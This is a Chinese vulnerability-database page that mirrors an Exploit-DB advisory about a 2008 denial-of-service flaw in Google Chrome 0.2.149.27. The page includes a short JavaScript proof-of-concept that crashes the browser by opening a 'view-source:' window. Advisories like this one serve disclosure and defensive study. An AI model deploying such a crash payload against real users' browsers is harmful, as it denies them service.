Google Chrome 0.2.149 - Malformed 'view-source' HTTP Header Remote Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056830 漏洞类型
发布时间 2008-09-05 更新时间 2008-09-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32335
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/31035/info

Google Chrome is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted HTTP 'view-source' headers.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

Google Chrome 0.2.149.27 is vulnerable; other versions may also be affected. 

<script>
a = window.open("view-source:http://123")
a.alert(1)
</script>